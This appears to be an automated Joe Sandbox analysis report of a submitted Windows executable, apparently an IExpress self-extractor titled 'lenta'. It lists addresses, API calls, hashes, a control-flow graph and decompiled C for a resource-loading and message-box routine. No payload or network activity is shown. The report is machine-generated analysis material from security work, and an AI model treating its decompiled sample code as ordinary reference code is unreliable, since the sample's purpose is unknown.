                                                                                                                                                                                                                                              0x0097560c
                                                                                                                                                                                                                                              0x00975638
                                                                                                                                                                                                                                              0x00975641
                                                                                                                                                                                                                                              0x00975643
                                                                                                                                                                                                                                              0x00975645
                                                                                                                                                                                                                                              0x00975645
                                                                                                                                                                                                                                              0x0097564c
                                                                                                                                                                                                                                              0x00975652
                                                                                                                                                                                                                                              0x00975657
                                                                                                                                                                                                                                              0x00975659
                                                                                                                                                                                                                                              0x00975696
                                                                                                                                                                                                                                              0x0097569c
                                                                                                                                                                                                                                              0x0097589f
                                                                                                                                                                                                                                              0x009758a7
                                                                                                                                                                                                                                              0x009758ac
                                                                                                                                                                                                                                              0x009758b3
                                                                                                                                                                                                                                              0x009758b5
                                                                                                                                                                                                                                              0x009756a2
                                                                                                                                                                                                                                              0x009756a2
                                                                                                                                                                                                                                              0x009756a8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009756ae
                                                                                                                                                                                                                                              0x009756ae
                                                                                                                                                                                                                                              0x009756b9
                                                                                                                                                                                                                                              0x009756bf
                                                                                                                                                                                                                                              0x009756c1
                                                                                                                                                                                                                                              0x009756f3
                                                                                                                                                                                                                                              0x009756f3
                                                                                                                                                                                                                                              0x00975705
                                                                                                                                                                                                                                              0x0097570a
                                                                                                                                                                                                                                              0x00975711
                                                                                                                                                                                                                                              0x00975717
                                                                                                                                                                                                                                              0x00975724
                                                                                                                                                                                                                                              0x00975726
                                                                                                                                                                                                                                              0x00975729
                                                                                                                                                                                                                                              0x00975730
                                                                                                                                                                                                                                              0x00975737
                                                                                                                                                                                                                                              0x0097573d
                                                                                                                                                                                                                                              0x00975740
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097572b
                                                                                                                                                                                                                                              0x0097572b
                                                                                                                                                                                                                                              0x0097572e
                                                                                                                                                                                                                                              0x00975742
                                                                                                                                                                                                                                              0x00975742
                                                                                                                                                                                                                                              0x00975745
                                                                                                                                                                                                                                              0x0097576b
                                                                                                                                                                                                                                              0x0097576b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975747
                                                                                                                                                                                                                                              0x00975747
                                                                                                                                                                                                                                              0x0097574d
                                                                                                                                                                                                                                              0x0097574f
                                                                                                                                                                                                                                              0x00975771
                                                                                                                                                                                                                                              0x00975771
                                                                                                                                                                                                                                              0x00975773
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975751
                                                                                                                                                                                                                                              0x00975751
                                                                                                                                                                                                                                              0x00975753
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975755
                                                                                                                                                                                                                                              0x0097575b
                                                                                                                                                                                                                                              0x00975760
                                                                                                                                                                                                                                              0x00975762
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975764
                                                                                                                                                                                                                                              0x00975764
                                                                                                                                                                                                                                              0x00975769
                                                                                                                                                                                                                                              0x0097577e
                                                                                                                                                                                                                                              0x0097577e
                                                                                                                                                                                                                                              0x00975781
                                                                                                                                                                                                                                              0x00975788
                                                                                                                                                                                                                                              0x0097578d
                                                                                                                                                                                                                                              0x0097578f
                                                                                                                                                                                                                                              0x009757b2
                                                                                                                                                                                                                                              0x009757b8
                                                                                                                                                                                                                                              0x009757bd
                                                                                                                                                                                                                                              0x009757bf
                                                                                                                                                                                                                                              0x009757cd
                                                                                                                                                                                                                                              0x009757cd
                                                                                                                                                                                                                                              0x009757dd
                                                                                                                                                                                                                                              0x009757e3
                                                                                                                                                                                                                                              0x009757ef
                                                                                                                                                                                                                                              0x009757f5
                                                                                                                                                                                                                                              0x009757f8
                                                                                                                                                                                                                                              0x0097580a
                                                                                                                                                                                                                                              0x0097580a
                                                                                                                                                                                                                                              0x009757fa
                                                                                                                                                                                                                                              0x00975802
                                                                                                                                                                                                                                              0x00975802
                                                                                                                                                                                                                                              0x0097580d
                                                                                                                                                                                                                                              0x0097580f
                                                                                                                                                                                                                                              0x00975830
                                                                                                                                                                                                                                              0x00975836
                                                                                                                                                                                                                                              0x0097583d
                                                                                                                                                                                                                                              0x0097584b
                                                                                                                                                                                                                                              0x00975851
                                                                                                                                                                                                                                              0x00975855
                                                                                                                                                                                                                                              0x0097585a
                                                                                                                                                                                                                                              0x0097585c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097585e
                                                                                                                                                                                                                                              0x0097585e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097585e
                                                                                                                                                                                                                                              0x00975811
                                                                                                                                                                                                                                              0x00975817
                                                                                                                                                                                                                                              0x00975819
                                                                                                                                                                                                                                              0x0097581f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097581f
                                                                                                                                                                                                                                              0x00975791
                                                                                                                                                                                                                                              0x00975797
                                                                                                                                                                                                                                              0x0097579c
                                                                                                                                                                                                                                              0x0097579e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009757a0
                                                                                                                                                                                                                                              0x009757a9
                                                                                                                                                                                                                                              0x009757ae
                                                                                                                                                                                                                                              0x009757b0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009757b0
                                                                                                                                                                                                                                              0x0097579e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975769
                                                                                                                                                                                                                                              0x00975762
                                                                                                                                                                                                                                              0x00975753
                                                                                                                                                                                                                                              0x0097574f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097572e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975864
                                                                                                                                                                                                                                              0x00975864
                                                                                                                                                                                                                                              0x00975864
                                                                                                                                                                                                                                              0x00975717
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009756c3
                                                                                                                                                                                                                                              0x009756c5
                                                                                                                                                                                                                                              0x009756c9
                                                                                                                                                                                                                                              0x009756ce
                                                                                                                                                                                                                                              0x009756d0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009756d6
                                                                                                                                                                                                                                              0x009756d6
                                                                                                                                                                                                                                              0x009756d8
                                                                                                                                                                                                                                              0x009756dd
                                                                                                                                                                                                                                              0x009756df
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009756e1
                                                                                                                                                                                                                                              0x009756e2
                                                                                                                                                                                                                                              0x009756e4
                                                                                                                                                                                                                                              0x009756e6
                                                                                                                                                                                                                                              0x009756eb
                                                                                                                                                                                                                                              0x009756ed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009756f3
                                                                                                                                                                                                                                              0x009756f3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097586c
                                                                                                                                                                                                                                              0x00975878
                                                                                                                                                                                                                                              0x0097587e
                                                                                                                                                                                                                                              0x00975882
                                                                                                                                                                                                                                              0x00975883
                                                                                                                                                                                                                                              0x00975889
                                                                                                                                                                                                                                              0x0097588e
                                                                                                                                                                                                                                              0x0097588e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975896
                                                                                                                                                                                                                                              0x009756ed
                                                                                                                                                                                                                                              0x009756df
                                                                                                                                                                                                                                              0x009756d0
                                                                                                                                                                                                                                              0x009756c1
                                                                                                                                                                                                                                              0x009756a8
                                                                                                                                                                                                                                              0x0097565b
                                                                                                                                                                                                                                              0x0097565b
                                                                                                                                                                                                                                              0x0097565d
                                                                                                                                                                                                                                              0x00975669
                                                                                                                                                                                                                                              0x00975669
                                                                                                                                                                                                                                              0x0097565f
                                                                                                                                                                                                                                              0x0097565f
                                                                                                                                                                                                                                              0x00975665
                                                                                                                                                                                                                                              0x00975667
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975667
                                                                                                                                                                                                                                              0x0097566c
                                                                                                                                                                                                                                              0x00975673
                                                                                                                                                                                                                                              0x00975678
                                                                                                                                                                                                                                              0x0097567a
                                                                                                                                                                                                                                              0x0097589b
                                                                                                                                                                                                                                              0x0097589b
                                                                                                                                                                                                                                              0x00975680
                                                                                                                                                                                                                                              0x00975685
                                                                                                                                                                                                                                              0x0097568c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097568c
                                                                                                                                                                                                                                              0x0097567a
                                                                                                                                                                                                                                              0x0097560e
                                                                                                                                                                                                                                              0x00975613
                                                                                                                                                                                                                                              0x0097561a
                                                                                                                                                                                                                                              0x00975620
                                                                                                                                                                                                                                              0x00975626
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975626
                                                                                                                                                                                                                                              0x009755db
                                                                                                                                                                                                                                              0x009755e0
                                                                                                                                                                                                                                              0x009755e7
                                                                                                                                                                                                                                              0x009755f1
                                                                                                                                                                                                                                              0x009755f6
                                                                                                                                                                                                                                              0x009755f6
                                                                                                                                                                                                                                              0x009755f6
                                                                                                                                                                                                                                              0x009758b7
                                                                                                                                                                                                                                              0x009758c7

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 009755CF
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00975638
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 0097564C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00975620
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                                • Part of subcall function 00976285: GetLastError.KERNEL32(00975BBC), ref: 00976285
                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 009756B9
                                                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0097571E
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00975737
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 009757CD
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 009757EF
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00975802
                                                                                                                                                                                                                                                • Part of subcall function 00972630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00972654
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00975830
                                                                                                                                                                                                                                                • Part of subcall function 00976517: FindResourceA.KERNEL32(00970000,000007D6,00000005), ref: 0097652A
                                                                                                                                                                                                                                                • Part of subcall function 00976517: LoadResource.KERNEL32(00970000,00000000,?,?,00972EE8,00000000,009719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00976538
                                                                                                                                                                                                                                                • Part of subcall function 00976517: DialogBoxIndirectParamA.USER32(00970000,00000000,00000547,009719E0,00000000), ref: 00976557
                                                                                                                                                                                                                                                • Part of subcall function 00976517: FreeResource.KERNEL32(00000000,?,?,00972EE8,00000000,009719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00976560
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00975878
                                                                                                                                                                                                                                                • Part of subcall function 0097597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009759A8
                                                                                                                                                                                                                                                • Part of subcall function 0097597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 009759AF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                              • API String ID: 2436801531-2740620654
                                                                                                                                                                                                                                              • Opcode ID: 1e30abeca76fae0320af00ca737966c7dc71e3c0c0b97220180adbd284869b8a
                                                                                                                                                                                                                                              • Instruction ID: 3849fc9cb4ba2f5c38a821cdd52872ab0e1de5e7daa6cd170bf74fbcb0a81838
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e30abeca76fae0320af00ca737966c7dc71e3c0c0b97220180adbd284869b8a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30812B73A08A049BDBA4AB748C45BEE73ADDBE1300F458466F58ED2191EFF48DC18A51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 406 9744b9-9744f8 407 9744fe-974525 LoadStringA 406->407 408 974679-97467b 406->408 410 974527-97452e call 97681f 407->410 411 974562-974568 407->411 409 97467c-97468c call 976ce0 408->409 420 974530-97453d call 9767c9 410->420 421 97453f 410->421 413 97456b-974570 411->413 413->413 416 974572-97457c 413->416 418 97457e-974580 416->418 419 9745c9-9745cb 416->419 425 974583-974588 418->425 422 974607-974617 LocalAlloc 419->422 423 9745cd-9745cf 419->423 420->421 424 974544-974554 MessageBoxA 420->424 421->424 429 97455a-97455d 422->429 430 97461d-974628 call 971680 422->430 428 9745d2-9745d7 423->428 424->429 425->425 431 97458a-97458c 425->431 428->428 432 9745d9-9745ed LocalAlloc 428->432 429->409 436 97462d-97463d MessageBeep call 97681f 430->436 434 97458f-974594 431->434 432->429 435 9745f3-974605 call 97171e 432->435 434->434 437 974596-9745ad LocalAlloc 434->437 435->436 444 97463f-97464c call 9767c9 436->444 445 97464e 436->445 437->429 440 9745af-9745c7 call 97171e 437->440 440->436 444->445 447 974653-974677 MessageBoxA LocalFree 444->447 445->447 447->409
                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E009744B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                                                                              				char _v576;
                                                                                                                                                                                                                                              				void* _v580;
                                                                                                                                                                                                                                              				struct HWND__* _v584;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t34;
                                                                                                                                                                                                                                              				void* _t37;
                                                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                                                              				signed int _t52;
                                                                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                                                                              				intOrPtr _t55;
                                                                                                                                                                                                                                              				intOrPtr _t58;
                                                                                                                                                                                                                                              				intOrPtr _t59;
                                                                                                                                                                                                                                              				int _t64;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				intOrPtr* _t67;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              				intOrPtr* _t73;
                                                                                                                                                                                                                                              				intOrPtr* _t76;
                                                                                                                                                                                                                                              				intOrPtr* _t77;
                                                                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                                                                              				void* _t81;
                                                                                                                                                                                                                                              				void* _t82;
                                                                                                                                                                                                                                              				intOrPtr* _t84;
                                                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                                                              				signed int _t89;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t75 = __edx;
                                                                                                                                                                                                                                              				_t34 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                              				_v584 = __ecx;
                                                                                                                                                                                                                                              				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                              				_t67 = _a4;
                                                                                                                                                                                                                                              				_t69 = 0xd;
                                                                                                                                                                                                                                              				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                              				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                              				_v580 = _t37;
                                                                                                                                                                                                                                              				asm("movsb");
                                                                                                                                                                                                                                              				if(( *0x978a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              					_t39 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_v576 = 0;
                                                                                                                                                                                                                                              					LoadStringA( *0x979a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                              					if(_v576 != 0) {
                                                                                                                                                                                                                                              						_t73 =  &_v576;
                                                                                                                                                                                                                                              						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                              						_t75 = _t16;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t43 =  *_t73;
                                                                                                                                                                                                                                              							_t73 = _t73 + 1;
                                                                                                                                                                                                                                              						} while (_t43 != 0);
                                                                                                                                                                                                                                              						_t84 = _v580;
                                                                                                                                                                                                                                              						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                              						if(_t84 == 0) {
                                                                                                                                                                                                                                              							if(_t67 == 0) {
                                                                                                                                                                                                                                              								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                              								_t83 = _t27;
                                                                                                                                                                                                                                              								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                              								_t80 = _t44;
                                                                                                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t75 = _t83;
                                                                                                                                                                                                                                              									_t74 = _t80;
                                                                                                                                                                                                                                              									E00971680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t76 = _t67;
                                                                                                                                                                                                                                              								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                              								_t85 = _t24;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t55 =  *_t76;
                                                                                                                                                                                                                                              									_t76 = _t76 + 1;
                                                                                                                                                                                                                                              								} while (_t55 != 0);
                                                                                                                                                                                                                                              								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                              								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                              								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                              								_t80 = _t44;
                                                                                                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E0097171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t77 = _t67;
                                                                                                                                                                                                                                              							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                              							_t81 = _t18;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t58 =  *_t77;
                                                                                                                                                                                                                                              								_t77 = _t77 + 1;
                                                                                                                                                                                                                                              							} while (_t58 != 0);
                                                                                                                                                                                                                                              							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                              							_t82 = _t84 + 1;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t59 =  *_t84;
                                                                                                                                                                                                                                              								_t84 = _t84 + 1;
                                                                                                                                                                                                                                              							} while (_t59 != 0);
                                                                                                                                                                                                                                              							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                              							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                              							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                              							_t80 = _t44;
                                                                                                                                                                                                                                              							if(_t80 == 0) {
                                                                                                                                                                                                                                              								goto L6;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_push(_v580);
                                                                                                                                                                                                                                              								E0097171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                              								L23:
                                                                                                                                                                                                                                              								MessageBeep(_a12);
                                                                                                                                                                                                                                              								if(E0097681F(_t67) == 0) {
                                                                                                                                                                                                                                              									L25:
                                                                                                                                                                                                                                              									_t49 = 0x10000;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t54 = E009767C9(_t74, _t74);
                                                                                                                                                                                                                                              									_t49 = 0x190000;
                                                                                                                                                                                                                                              									if(_t54 == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                              								_t83 = _t52;
                                                                                                                                                                                                                                              								LocalFree(_t80);
                                                                                                                                                                                                                                              								_t39 = _t52;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(E0097681F(_t67) == 0) {
                                                                                                                                                                                                                                              							L4:
                                                                                                                                                                                                                                              							_t64 = 0x10010;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t66 = E009767C9(0, 0);
                                                                                                                                                                                                                                              							_t64 = 0x190010;
                                                                                                                                                                                                                                              							if(_t66 == 0) {
                                                                                                                                                                                                                                              								goto L4;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                              						L6:
                                                                                                                                                                                                                                              						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                              			}



































                                                                                                                                                                                                                                              0x009744b9
                                                                                                                                                                                                                                              0x009744c4
                                                                                                                                                                                                                                              0x009744cb
                                                                                                                                                                                                                                              0x009744d8
                                                                                                                                                                                                                                              0x009744e4
                                                                                                                                                                                                                                              0x009744eb
                                                                                                                                                                                                                                              0x009744ee
                                                                                                                                                                                                                                              0x009744ef
                                                                                                                                                                                                                                              0x009744ef
                                                                                                                                                                                                                                              0x009744f1
                                                                                                                                                                                                                                              0x009744f7
                                                                                                                                                                                                                                              0x009744f8
                                                                                                                                                                                                                                              0x0097467b
                                                                                                                                                                                                                                              0x009744fe
                                                                                                                                                                                                                                              0x00974509
                                                                                                                                                                                                                                              0x00974518
                                                                                                                                                                                                                                              0x00974525
                                                                                                                                                                                                                                              0x00974562
                                                                                                                                                                                                                                              0x00974568
                                                                                                                                                                                                                                              0x00974568
                                                                                                                                                                                                                                              0x0097456b
                                                                                                                                                                                                                                              0x0097456b
                                                                                                                                                                                                                                              0x0097456d
                                                                                                                                                                                                                                              0x0097456e
                                                                                                                                                                                                                                              0x00974572
                                                                                                                                                                                                                                              0x00974578
                                                                                                                                                                                                                                              0x0097457c
                                                                                                                                                                                                                                              0x009745cb
                                                                                                                                                                                                                                              0x00974607
                                                                                                                                                                                                                                              0x00974607
                                                                                                                                                                                                                                              0x0097460d
                                                                                                                                                                                                                                              0x00974613
                                                                                                                                                                                                                                              0x00974617
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097461d
                                                                                                                                                                                                                                              0x00974623
                                                                                                                                                                                                                                              0x00974626
                                                                                                                                                                                                                                              0x00974628
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974628
                                                                                                                                                                                                                                              0x009745cd
                                                                                                                                                                                                                                              0x009745cd
                                                                                                                                                                                                                                              0x009745cf
                                                                                                                                                                                                                                              0x009745cf
                                                                                                                                                                                                                                              0x009745d2
                                                                                                                                                                                                                                              0x009745d2
                                                                                                                                                                                                                                              0x009745d4
                                                                                                                                                                                                                                              0x009745d5
                                                                                                                                                                                                                                              0x009745db
                                                                                                                                                                                                                                              0x009745de
                                                                                                                                                                                                                                              0x009745e3
                                                                                                                                                                                                                                              0x009745e9
                                                                                                                                                                                                                                              0x009745ed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009745f3
                                                                                                                                                                                                                                              0x009745fd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974602
                                                                                                                                                                                                                                              0x009745ed
                                                                                                                                                                                                                                              0x0097457e
                                                                                                                                                                                                                                              0x0097457e
                                                                                                                                                                                                                                              0x00974580
                                                                                                                                                                                                                                              0x00974580
                                                                                                                                                                                                                                              0x00974583
                                                                                                                                                                                                                                              0x00974583
                                                                                                                                                                                                                                              0x00974585
                                                                                                                                                                                                                                              0x00974586
                                                                                                                                                                                                                                              0x0097458a
                                                                                                                                                                                                                                              0x0097458c
                                                                                                                                                                                                                                              0x0097458f
                                                                                                                                                                                                                                              0x0097458f
                                                                                                                                                                                                                                              0x00974591
                                                                                                                                                                                                                                              0x00974592
                                                                                                                                                                                                                                              0x0097459b
                                                                                                                                                                                                                                              0x0097459e
                                                                                                                                                                                                                                              0x009745a3
                                                                                                                                                                                                                                              0x009745a9
                                                                                                                                                                                                                                              0x009745ad
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009745af
                                                                                                                                                                                                                                              0x009745af
                                                                                                                                                                                                                                              0x009745bf
                                                                                                                                                                                                                                              0x0097462d
                                                                                                                                                                                                                                              0x00974630
                                                                                                                                                                                                                                              0x0097463d
                                                                                                                                                                                                                                              0x0097464e
                                                                                                                                                                                                                                              0x0097464e
                                                                                                                                                                                                                                              0x0097463f
                                                                                                                                                                                                                                              0x00974640
                                                                                                                                                                                                                                              0x00974647
                                                                                                                                                                                                                                              0x0097464c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097464c
                                                                                                                                                                                                                                              0x00974666
                                                                                                                                                                                                                                              0x0097466d
                                                                                                                                                                                                                                              0x0097466f
                                                                                                                                                                                                                                              0x00974675
                                                                                                                                                                                                                                              0x00974675
                                                                                                                                                                                                                                              0x009745ad
                                                                                                                                                                                                                                              0x00974527
                                                                                                                                                                                                                                              0x0097452e
                                                                                                                                                                                                                                              0x0097453f
                                                                                                                                                                                                                                              0x0097453f
                                                                                                                                                                                                                                              0x00974530
                                                                                                                                                                                                                                              0x00974531
                                                                                                                                                                                                                                              0x00974538
